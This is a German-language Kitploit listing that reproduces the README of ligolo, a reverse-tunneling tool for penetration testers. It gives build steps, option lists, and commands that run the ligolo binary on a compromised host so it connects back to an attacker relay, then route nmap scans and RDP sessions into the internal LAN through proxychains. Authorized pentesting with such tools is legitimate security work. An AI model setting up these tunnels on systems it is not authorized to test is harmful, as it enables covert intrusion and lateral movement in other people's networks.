Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
ligolo — Reverse Tunneling einfach gemacht für Pentester, von Pentestern https://sysdream.com/ | Kitploit
Tools/GitHubGitHub/sysdream/ligolo
Laterale BewegungPenetrationstestsRed Teaming
GitHubsysdream/ligolo

ligolo

Reverse Tunneling einfach gemacht für Pentester, von Pentestern https://sysdream.com/

Repository anzeigen
1.8k22710vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Ligolo : Reverse Tunneling leicht gemacht für Pentester, von Pentestern

forthebadge forthebadge

Ligolo

Inhaltsverzeichnis

  • Einleitung
  • Anwendungsfall
  • Kurze Demo
  • Leistung
  • Verwendung
    • Setup / Kompilieren
    • Wie benutzt man?
    • TL;DR
    • Optionen
  • Funktionen
  • To Do
  • Lizenzierung
  • Danksagungen

Einleitung

Ligolo ist ein einfaches und Werkzeug zum Aufbau von - oder -Tunneln aus einer Reverse-Verbindung in vollständiger Sicherheit (TLS-Zertifikat mit elliptischer Kurve).

leichtgewichtiges
SOCKS5
TCP

Es ist vergleichbar mit Meterpreter mit Autoroute + Socks4a, aber stabiler und schneller.

Anwendungsfall

Sie haben während Ihres externen Audits einen Windows / Linux / Mac Server kompromittiert. Dieser Server befindet sich in einem LAN-Netzwerk und Sie möchten Verbindungen zu anderen Maschinen in diesem Netzwerk herstellen.

Ligolo kann einen Tunnel einrichten, um auf die Ressourcen des internen Servers zuzugreifen.

Kurze Demo

Relay einer RDP-Verbindung mit Proxychains (WAN).

RDP

Leistung

Hier ist ein Screenshot eines Geschwindigkeitstests zwischen zwei 100-Mbit/s-Hosts (ligolo / localrelay). Die Leistung kann je nach System- und Netzwerkkonfiguration variieren.

Speedtest

Verwendung

Setup / Kompilieren

Stellen Sie sicher, dass Go installiert und funktionsfähig ist.

  1. Ligolo und Abhängigkeiten herunterladen
root@kitploit:~
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
  1. Selbstsignierte TLS-Zertifikate generieren (werden im Ordner certs abgelegt)
root@kitploit:~
make certs TLS_HOST=example.com

HINWEIS: Sie können auch Ihre eigenen Zertifikate verwenden, indem Sie die TLS_CERT-Make-Option beim Aufruf von build verwenden. Beispiel: make build-all TLS_CERT=certs/mycert.pem.

  1. Bauen
  • 3.1. Für alle Architekturen
root@kitploit:~
make build-all
  • 3.2. (oder) Für die aktuelle Architektur
root@kitploit:~
make build

Wie benutzt man?

Ligolo besteht aus zwei Modulen:

  • localrelay
  • ligolo

Localrelay ist dazu gedacht, auf dem Steuerserver (dem Angreiferserver) gestartet zu werden.

Ligolo ist das Programm, das auf dem Zielcomputer ausgeführt wird.

Für localrelay können Sie die Standardoptionen belassen. Es hört auf allen Schnittstellen auf Port 5555 und wartet auf Verbindungen von ligolo (-relayserver-Parameter).

Für ligolo müssen Sie die IP-Adresse des Relay-Servers (oder Ihres Angriffsservers) mit dem Parameter -relayserver ip:port angeben.

Sie können die Option -h für Hilfe verwenden.

Sobald die Verbindung zwischen Ligolo und LocalRelay hergestellt ist, wird ein SOCKS5-Proxy auf TCP-Port 1080 auf dem Relay-Server eingerichtet (Sie können die TCP-Adresse/den Port mit der Option -localserver ändern).

Danach müssen Sie nur noch Ihr bevorzugtes Werkzeug (z.B. Proxychains) verwenden und das LAN-Netzwerk des Clients erkunden.

TL;DR

Auf Ihrem Angriffsserver.

root@kitploit:~
./bin/localrelay_linux_amd64

Auf dem kompromittierten Host.

root@kitploit:~
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

Sobald die Verbindung hergestellt ist, setzen Sie die folgenden Parameter in der ProxyChains-Konfigurationsdatei (auf dem Angriffsserver):

root@kitploit:~
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5     127.0.0.1 1080

Profitieren.

root@kitploit:~
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123

Optionen

Localrelay-Optionen:

root@kitploit:~
Usage of localrelay:
  -certfile string
    	The TLS server certificate (default "certs/server.crt")
  -keyfile string
    	The TLS server key (default "certs/server.key")
  -localserver string
    	The local server address (your proxychains parameter) (default "127.0.0.1:1080")
  -relayserver string
    	The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo-Optionen:

root@kitploit:~
Usage of ligolo:
  -autorestart
    	Attempt to reconnect in case of an exception
  -relayserver string
    	The relay server (the connect-back address) (default "127.0.0.1:5555")
  -skipverify
    	Skip TLS certificate pinning verification
  -targetserver string
    	The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

Funktionen

  • TLS 1.3 Tunnel mit TLS Pinning
  • Multiplattform (Windows / Linux / Mac / ...)
  • Multiplexing (1 TCP-Verbindung für alle Datenströme)
  • SOCKS5 Proxy oder einfaches Relay

To Do

  • Besseres Timeout-Handling
  • SOCKS5 UDP Unterstützung
  • mTLS implementieren

Lizenzierung

GNU General Public License v3.0 (Siehe LICENSING).

Danksagungen

  • Nicolas Chatelain <n.chatelain -at- sysdream.com>

Sysdream

Tool herunterladen